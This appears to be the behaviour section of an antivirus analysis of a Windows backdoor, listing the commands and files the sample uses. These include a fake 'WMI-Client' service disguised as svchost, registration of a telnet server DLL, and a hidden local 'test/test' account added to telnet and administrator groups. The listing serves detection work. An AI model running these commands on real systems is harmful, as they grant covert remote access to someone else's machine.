Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\WMI-Client] 'Start' = '00000002'
- <SYSTEM32>\svchost.exe /service
- <SYSTEM32>\sc.exe create "WMI-Client" binpath= "<SYSTEM32>\svchost.exe " start= auto
- %WINDIR%\regedit.exe /s 0.reg
- <SYSTEM32>\sc.exe description WMI-Client "Microsoft WMI-Client"
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\sc.exe start WMI-Client
- <SYSTEM32>\net1.exe localgroup TelnetClients /add
- <SYSTEM32>\cmd.exe /c """%TEMP%\1.tmp\test-test-31337.bat"""
- <SYSTEM32>\net1.exe user test test /add
- <SYSTEM32>\net1.exe localgroup TelnetClients test /add
- <SYSTEM32>\net1.exe localgroup %USERNAME%en test /add
- %TEMP%\1.tmp\test-test-31337.bat
- <SYSTEM32>\0.reg
- <SYSTEM32>\svchost.exe
- %TEMP%\1.tmp\b2e
- %TEMP%\1.tmp\b2e.dll
- %TEMP%\1.tmp\binaries.txt
- %TEMP%\1.tmp\test-test-31337.bat
- %TEMP%\1.tmp\b2e.dll
- <SYSTEM32>\0.reg
- %TEMP%\1.tmp\binaries.txt
- %TEMP%\1.tmp\b2e
- ClassName: 'RegEdit_RegEdit' WindowName: ''